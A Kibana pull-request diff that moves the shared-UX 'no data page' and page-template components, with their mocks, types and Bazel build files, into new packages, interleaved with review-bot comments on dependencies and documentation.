+ solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts b/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts new file mode 100644 index 0000000000000..3590a3e896a2e --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/src/storybook/solution_nav.ts 
@@ -0,0 +1,115 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import type { + KibanaPageTemplateProps, + KibanaPageTemplateServices, +} from '@kbn/shared-ux-page-kibana-template-types'; + +type SolutionNav = NonNullable; +export type SolutionNavArguments = Pick; + +type PropArguments = SolutionNavArguments; + +export type Params = ArgumentParams & NoDataConfigPageStorybookParams; + +const noDataConfigMock = new NoDataConfigPageStorybookMock(); + +export const solutionNavArguments: ArgumentParams = { + name: { + control: 'text', + defaultValue: 'Kibana', + }, + icon: { + control: { type: 'radio' }, + options: ['logoKibana', 'logoObservability', 'logoSecurity'], + defaultValue: 'logoKibana', + }, + canBeCollapsed: { + control: 'boolean', + defaultValue: true, + }, +}; + +export const solutionNavProps = { + items: [ + { + name: 'Ingest', + id: '1', + items: [ + { + name: 'Ingest Node Pipelines', + id: '1.1', + }, + { + name: 'Logstash Pipelines', + id: '1.2', + }, + { + name: 'Beats Central Management', + id: '1.3', + }, + ], + }, + { + name: 'Data', + id: '2', + items: [ + { + name: 'Index Management', + id: '2.1', + }, + { + name: 'Index Lifecycle Policies', + id: '2.2', + }, + { + name: 'Snapshot and Restore', + id: '2.3', + }, + ], + }, + ], +}; + +export class StorybookMock extends AbstractStorybookMock< + 
KibanaPageTemplateProps, + KibanaPageTemplateServices, + PropArguments +> { + propArguments = { + ...solutionNavArguments, + }; + + serviceArguments = {}; + + dependencies = [noDataConfigMock]; + + getProps(params?: Params): KibanaPageTemplateProps { + const result: KibanaPageTemplateProps = { + solutionNav: { + name: this.getArgumentValue('name', params), + icon: this.getArgumentValue('icon', params), + canBeCollapsed: this.getArgumentValue('canBeCollapsed', params), + ...solutionNavProps, + }, + }; + + return result; + } + + getServices(params: Params): KibanaPageTemplateServices { + return { ...noDataConfigMock.getServices(params) }; + } +} diff --git a/packages/shared-ux/page/kibana_template/mocks/tsconfig.json b/packages/shared-ux/page/kibana_template/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/kibana_template/types/BUILD.bazel b/packages/shared-ux/page/kibana_template/types/BUILD.bazel new file mode 100644 index 0000000000000..45cbd0fd4cc42 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/BUILD.bazel 
@@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/kibana_template/types/README.mdx b/packages/shared-ux/page/kibana_template/types/README.mdx new file mode 100644 index 0000000000000..8245f7d8d8c21 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-kibana-template-types + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/src/page_template/types.ts b/packages/shared-ux/page/kibana_template/types/index.d.ts similarity index 74% rename from packages/kbn-shared-ux-components/src/page_template/types.ts rename to packages/shared-ux/page/kibana_template/types/index.d.ts index 6a8b0d583ed18..8f3129c31817d 100644 
--- a/packages/kbn-shared-ux-components/src/page_template/types.ts +++ b/packages/shared-ux/page/kibana_template/types/index.d.ts @@ -9,7 +9,15 @@ import { EuiPageTemplateProps } from '@elastic/eui'; import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; -import { NoDataPageProps } from './no_data_page'; +import { + NoDataConfig, + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +export type KibanaPageTemplateKibanaDependencies = NoDataConfigPageKibanaDependencies; +export type KibanaPageTemplateServices = NoDataConfigPageServices; +export type { NoDataConfig } from '@kbn/shared-ux-page-no-data-config-types'; export type KibanaPageTemplateProps = EuiPageTemplateProps & { /** @@ -27,5 +35,5 @@ export type KibanaPageTemplateProps = EuiPageTemplateProps & { * Accepts a configuration object, that when provided, ignores pageHeader and children and instead * displays Agent, Beats, and custom cards to direct users to the right ingest location */ - noDataConfig?: NoDataPageProps; + noDataConfig?: NoDataConfig; }; diff --git a/packages/shared-ux/page/kibana_template/types/package.json b/packages/shared-ux/page/kibana_template/types/package.json new file mode 100644 index 0000000000000..4562e9a1becdd --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-kibana-template-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/packages/shared-ux/page/kibana_template/types/tsconfig.json b/packages/shared-ux/page/kibana_template/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/kibana_template/types/tsconfig.json 
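Review bot: `packages/shared-ux/page/kibana_template/types/package.json` sets `"main": "./target_node/index.js"`, but the matching `types/BUILD.bazel` only wraps the `*.d.ts` glob in a `js_library` and has no `jsts_transpiler` producing `target_node`, so `main` points at a path nothing in this PR generates. If that is the generator's convention for declaration-only packages, adding `"types": "./index.d.ts"` would make the intent explicit; otherwise `main` should be corrected or dropped. The `index.d.ts` hunks themselves read well; `import type` would be the preferred form for the new `@kbn/shared-ux-page-no-data-config-types` import, though inside a `.d.ts` it changes nothing at runtime.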
@@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/kbn-shared-ux-components/BUILD.bazel b/packages/shared-ux/page/no_data/impl/BUILD.bazel similarity index 75% rename from packages/kbn-shared-ux-components/BUILD.bazel rename to packages/shared-ux/page/no_data/impl/BUILD.bazel index 74924f4c6519d..13ffd0694bdd2 100644 --- a/packages/kbn-shared-ux-components/BUILD.bazel +++ b/packages/shared-ux/page/no_data/impl/BUILD.bazel @@ -2,19 +2,17 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_DIRNAME = "kbn-shared-ux-components" -PKG_REQUIRE_NAME = "@kbn/shared-ux-components" +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data" SOURCE_FILES = glob( [ "src/**/*.ts", "src/**/*.tsx", - "src/**/*.scss", - "src/**/*.mdx", - "src/**/*.svg", ], exclude = [ "**/*.test.*", + "**/*.stories.*", ], ) @@ -41,22 +39,10 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@elastic/eui", - "@npm//@emotion/css", - "@npm//@emotion/react", "@npm//classnames", - "@npm//react-use", "@npm//react", - "@npm//rxjs", - "@npm//url-loader", - "//packages/kbn-i18n-react", - "//packages/kbn-i18n", - "//packages/kbn-shared-ux-services", - "//packages/kbn-shared-ux-storybook", - "//packages/kbn-shared-ux-utility", "//packages/shared-ux/avatar/solution", "//packages/shared-ux/card/no_data/impl", - "//packages/shared-ux/link/redirect_app/impl", - "//packages/shared-ux/page/solution_nav", "//packages/shared-ux/prompt/no_data_views/impl", ] 
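Review bot: `src/no_data_page.tsx` in this package imports `i18n` from `@kbn/i18n` and `FormattedMessage` from `@kbn/i18n-react`, but the RUNTIME_DEPS rewritten in this hunk no longer list `//packages/kbn-i18n` or `//packages/kbn-i18n-react`, and the following TYPES_DEPS hunk likewise removes their `:npm_module_types` entries. Unless another listed dependency provides them transitively, the package will not resolve these modules at build or type-check time. Restore `"//packages/kbn-i18n",` and `"//packages/kbn-i18n-react",` in RUNTIME_DEPS and the matching `:npm_module_types` lines in TYPES_DEPS.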
@@ -71,24 +57,14 @@ RUNTIME_DEPS = [ # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ "@npm//@elastic/eui", - "@npm//@emotion/css", - "@npm//@emotion/react", "@npm//@types/classnames", "@npm//@types/jest", "@npm//@types/node", "@npm//@types/react", - "@npm//react-use", - "@npm//rxjs", "//packages/kbn-ambient-ui-types", - "//packages/kbn-i18n-react:npm_module_types", - "//packages/kbn-i18n:npm_module_types", - "//packages/kbn-shared-ux-services:npm_module_types", - "//packages/kbn-shared-ux-storybook:npm_module_types", - "//packages/kbn-shared-ux-utility:npm_module_types", "//packages/shared-ux/avatar/solution:npm_module_types", "//packages/shared-ux/card/no_data/impl:npm_module_types", - "//packages/shared-ux/link/redirect_app/impl:npm_module_types", - "//packages/shared-ux/page/solution_nav:npm_module_types", + "//packages/shared-ux/page/no_data/types:npm_module_types", "//packages/shared-ux/prompt/no_data_views/impl:npm_module_types", ] diff --git a/packages/shared-ux/page/no_data/impl/README.mdx b/packages/shared-ux/page/no_data/impl/README.mdx new file mode 100644 index 0000000000000..e5dd8c235c4ce --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/jest.config.js b/packages/shared-ux/page/no_data/impl/jest.config.js similarity index 81% rename from packages/kbn-shared-ux-components/jest.config.js rename to packages/shared-ux/page/no_data/impl/jest.config.js index c2ac8c3a57106..1b7ff2aafe740 100644 --- a/packages/kbn-shared-ux-components/jest.config.js +++ b/packages/shared-ux/page/no_data/impl/jest.config.js @@ -8,6 +8,6 @@ module.exports = { preset: '@kbn/test', - rootDir: '../..', - roots: ['/packages/kbn-shared-ux-components'], + rootDir: '../../../../..', + roots: ['/packages/shared-ux/page/no_data/impl'], }; 
diff --git a/packages/kbn-shared-ux-components/package.json b/packages/shared-ux/page/no_data/impl/package.json similarity index 80% rename from packages/kbn-shared-ux-components/package.json rename to packages/shared-ux/page/no_data/impl/package.json index 948df7fadd712..1f09f616a765f 100644 --- a/packages/kbn-shared-ux-components/package.json +++ b/packages/shared-ux/page/no_data/impl/package.json @@ -1,5 +1,5 @@ { - "name": "@kbn/shared-ux-components", + "name": "@kbn/shared-ux-page-no-data", "private": true, "version": "1.0.0", "main": "./target_node/index.js", diff --git a/packages/shared-ux/page/no_data/impl/src/action_card.tsx b/packages/shared-ux/page/no_data/impl/src/action_card.tsx new file mode 100644 index 0000000000000..0dec8c677b12c --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/action_card.tsx @@ -0,0 +1,30 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataCard, NoDataCardProps } from '@kbn/shared-ux-card-no-data'; +import { ActionCardProps } from '@kbn/shared-ux-page-no-data-types'; + +export type NoDataPageActions = NoDataCardProps; + +export const KEY_ELASTIC_AGENT = 'elasticAgent'; + +export const ActionCard = ({ action }: ActionCardProps) => { + const actionKeys = Object.keys(action); + + if (actionKeys.length !== 1) { + return null; + } + + const actionKey = actionKeys[0]; + const key = + actionKey === KEY_ELASTIC_AGENT ? 'empty-page-agent-action' : `empty-page-${actionKey}-action`; + + return ; +}; 
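Review bot: `ActionCard` silently renders nothing when `action` has zero keys or more than one, which hides a misconfigured `noDataConfig` from the caller, and the exported component carries no TSDoc stating that contract. Add `/** Renders the single action configured in the action prop; returns null when zero or several actions are given. */` above the export so consumers know the behavior is intentional. Style-wise, `const [actionKey] = actionKeys;` after the length check reads more directly than indexing `actionKeys[0]`, and the exported `NoDataPageActions` alias appears unused in this file, so a comment on who consumes it (or removing it) would help.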
diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts b/packages/shared-ux/page/no_data/impl/src/index.ts similarity index 65% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts rename to packages/shared-ux/page/no_data/impl/src/index.ts index a6f8c91f7614c..5438612b541bd 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/index.ts +++ b/packages/shared-ux/page/no_data/impl/src/index.ts @@ -7,5 +7,10 @@ */ export { NoDataPage } from './no_data_page'; -export type { NoDataPageProps } from './types'; -export { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_config_page'; +export type { + NoDataPageProps, + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +export { NoDataPageKibanaProvider, NoDataPageProvider } from './services'; diff --git a/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx new file mode 100644 index 0000000000000..6b56a44638358 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.stories.tsx 
@@ -0,0 +1,39 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataPageStorybookMock } from '@kbn/shared-ux-page-no-data-mocks'; +import type { NoDataPageStorybookParams } from '@kbn/shared-ux-page-no-data-mocks'; + +import { NoDataPage as Component } from './no_data_page'; + +import { NoDataPageProvider } from './services'; +import mdx from '../README.mdx'; + +const mock = new NoDataPageStorybookMock(); + +export default { + title: 'No Data/Page/No Data Page', + description: 'A component to display when there is no data available', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +export const NoDataPage = (params: NoDataPageStorybookParams) => { + return ( + + + + ); +}; + +NoDataPage.argTypes = mock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx similarity index 81% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx rename to packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx index b9474285469e1..576cf4f3b7230 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.test.tsx +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.test.tsx 
@@ -9,14 +9,15 @@ import React from 'react'; import { mountWithIntl } from '@kbn/test-jest-helpers'; import { NoDataCard } from '@kbn/shared-ux-card-no-data'; -import { SharedUxServicesProvider, mockServicesFactory } from '@kbn/shared-ux-services'; +import { getNoDataPageServicesMock } from '@kbn/shared-ux-page-no-data-mocks'; import { NoDataPage } from './no_data_page'; +import { NoDataPageProvider } from './services'; describe('NoDataPage', () => { test('render', () => { const component = mountWithIntl( - + { logo={'logoKibana'} docsLink="test" /> - + ); expect(component.find('h1').html()).toContain('Welcome to Elastic Analytics!'); expect(component.find(NoDataCard).length).toBe(1); diff --git a/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx b/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx new file mode 100644 index 0000000000000..1bc93123aea95 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/no_data_page.tsx 
@@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; +import classNames from 'classnames'; + +import { EuiLink, EuiSpacer, EuiText, EuiTextColor } from '@elastic/eui'; +import { i18n } from '@kbn/i18n'; +import { FormattedMessage } from '@kbn/i18n-react'; + +import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; + +import { ActionCard } from './action_card'; + +export const NoDataPage = ({ + solution, + logo, + action, + docsLink, + pageTitle, + className, +}: NoDataPageProps) => { + const title = + pageTitle || + i18n.translate('sharedUXPackages.noDataPage.welcomeTitle', { + defaultMessage: 'Welcome to Elastic {solution}!', + values: { solution }, + }); + + const link = ( + + + + ); + + const message = ( + + ); + + return ( +
+ + + +

{title}

+ +

{message}

+
+
+ + +
+ ); +}; diff --git a/packages/shared-ux/page/no_data/impl/src/services.tsx b/packages/shared-ux/page/no_data/impl/src/services.tsx new file mode 100644 index 0000000000000..3d10cc5547c92 --- /dev/null +++ b/packages/shared-ux/page/no_data/impl/src/services.tsx @@ -0,0 +1,33 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { NoDataCardKibanaProvider, NoDataCardProvider } from '@kbn/shared-ux-card-no-data'; + +import type { + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const NoDataPageProvider: FC = ({ children, ...services }) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const NoDataPageKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return {children}; +}; diff --git a/packages/kbn-shared-ux-components/tsconfig.json b/packages/shared-ux/page/no_data/impl/tsconfig.json similarity index 79% rename from packages/kbn-shared-ux-components/tsconfig.json rename to packages/shared-ux/page/no_data/impl/tsconfig.json index dd55bdb28a632..40ed24ecac4d2 100644 --- a/packages/kbn-shared-ux-components/tsconfig.json +++ b/packages/shared-ux/page/no_data/impl/tsconfig.json @@ -1,5 +1,5 @@ { - "extends": "../../tsconfig.bazel.json", + "extends": "../../../../../tsconfig.bazel.json", "compilerOptions": { "declaration": true, "declarationMap": true, @@ -10,7 +10,7 @@ "types": [ "jest", "node", - "@emotion/react/types/css-prop", + "react", "@kbn/ambient-ui-types", ] }, 
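Review bot: `const title = pageTitle || i18n.translate(...)` deliberately uses `||` rather than the lint-preferred `??`, so that an empty-string `pageTitle` (which `no_data_config.ts` in the mocks package uses as its default) also falls back to the translated welcome title; an autofix to `??` would silently change that. Add `// '||' on purpose: an empty pageTitle must also fall back to the translated default` above the assignment. `NoDataPage` is also a public export with no TSDoc; a one-line summary of which props drive the title, link and action card would help consumers.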
diff --git a/packages/shared-ux/page/no_data/mocks/BUILD.bazel b/packages/shared-ux/page/no_data/mocks/BUILD.bazel new file mode 100644 index 0000000000000..9296b28ed96f1 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/BUILD.bazel 
@@ -0,0 +1,141 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/card/no_data/mocks", + "//packages/shared-ux/storybook/mock", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. 
"//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "//packages/shared-ux/page/no_data/types", + "//packages/shared-ux/card/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data/mocks/README.md b/packages/shared-ux/page/no_data/mocks/README.md new file mode 100644 index 0000000000000..5714e473d1f0c --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/README.md 
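Review bot: `RUNTIME_DEPS` in `no_data/mocks/BUILD.bazel` lists only `@npm//react` and two package targets, yet `src/jest.ts` in this same change imports `deepmerge` and `lodash`; unless those resolve transitively through the card mocks package, the library needs `"@npm//deepmerge",` and `"@npm//lodash",` in `RUNTIME_DEPS` (and the lodash typings target, if the repo has one, in `TYPES_DEPS`). Build rules that under-declare dependencies tend to work only because a sibling happens to pull the package in, and then break silently when that sibling changes. Conversely `@npm//react` is declared although none of the mock sources shown import React, which looks like a leftover of the generator template.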
@@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-mocks + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data/mocks/package.json b/packages/shared-ux/page/no_data/mocks/package.json new file mode 100644 index 0000000000000..d6051a988cdc4 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-mocks", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/src/plugins/shared_ux/common/index.ts b/packages/shared-ux/page/no_data/mocks/src/index.ts old mode 100755 new mode 100644 similarity index 56% rename from src/plugins/shared_ux/common/index.ts rename to packages/shared-ux/page/no_data/mocks/src/index.ts index 92dee001d9012..a17ff47a67775 --- a/src/plugins/shared_ux/common/index.ts +++ b/packages/shared-ux/page/no_data/mocks/src/index.ts @@ -6,8 +6,10 @@ * Side Public License, v 1. */ -/** The ID of the Shared UX plugin. */ -export const PLUGIN_ID = 'sharedUX'; +export { + getServicesMock as getNoDataPageServicesMock, + getKibanaDependenciesMock as getNoDataPageKibanaDependenciesMock, +} from './jest'; -/** The name of the Shared UX plugin. */ -export const PLUGIN_NAME = 'sharedUX'; +export { NoDataPageStorybookMock } from './storybook'; +export type { Params as NoDataPageStorybookParams } from './storybook'; diff --git a/packages/shared-ux/page/no_data/mocks/src/jest.ts b/packages/shared-ux/page/no_data/mocks/src/jest.ts new file mode 100644 index 0000000000000..fd44142c2f597 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/src/jest.ts 
@@ -0,0 +1,64 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import deepmerge from 'deepmerge'; +import { isPlainObject } from 'lodash'; + +import type { + NoDataPageServices, + NoDataPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-types'; + +import { + getNoDataCardServicesMock, + getNoDataCardKibanaDependenciesMock, +} from '@kbn/shared-ux-card-no-data-mocks'; + +const defaultParams = { + canAccessFleet: true, +}; + +export const getServicesMock = (params: Partial = defaultParams) => { + const canAccessFleet = + params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; + + const services: NoDataPageServices = { + ...getNoDataCardServicesMock(), + canAccessFleet, + }; + + return services; +}; + +/** + * Return a Jest mock of the Kibana dependencies for the `NoDataPageKibanaProvider`. + */ +export const getKibanaDependenciesMock = ( + params: Partial = defaultParams +): NoDataPageKibanaDependencies => { + const integrations = + params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; + + return deepmerge( + { + coreStart: { + application: { + capabilities: { + navLinks: { + integrations, + }, + }, + }, + }, + }, + getNoDataCardKibanaDependenciesMock(), + { + isMergeableObject: isPlainObject, + } + ); +}; diff --git a/packages/shared-ux/page/no_data/mocks/src/storybook.ts b/packages/shared-ux/page/no_data/mocks/src/storybook.ts new file mode 100644 index 0000000000000..899ddf819a7d6 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/src/storybook.ts 
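Review bot: `getServicesMock` has no TSDoc and no explicit return type, while its sibling `getKibanaDependenciesMock` in the same file has both; add `/** Return a Jest mock of the services for the `NoDataPageProvider`. */` above it and `: NoDataPageServices` on its signature so the two helpers read the same way. Both functions spell the default as `params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet`, which is `params.canAccessFleet ?? defaultParams.canAccessFleet` (the two differ only for an explicit `null`, which a `Partial<…>` parameter does not admit). The `Partial` parameter type appears without its argument in the hunk as rendered; presumably `Partial<typeof defaultParams>` or similar was stripped. A short comment on the nested `coreStart.application.capabilities.navLinks.integrations` literal saying that this is where the mock expresses `canAccessFleet` would help readers who only see the services side.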
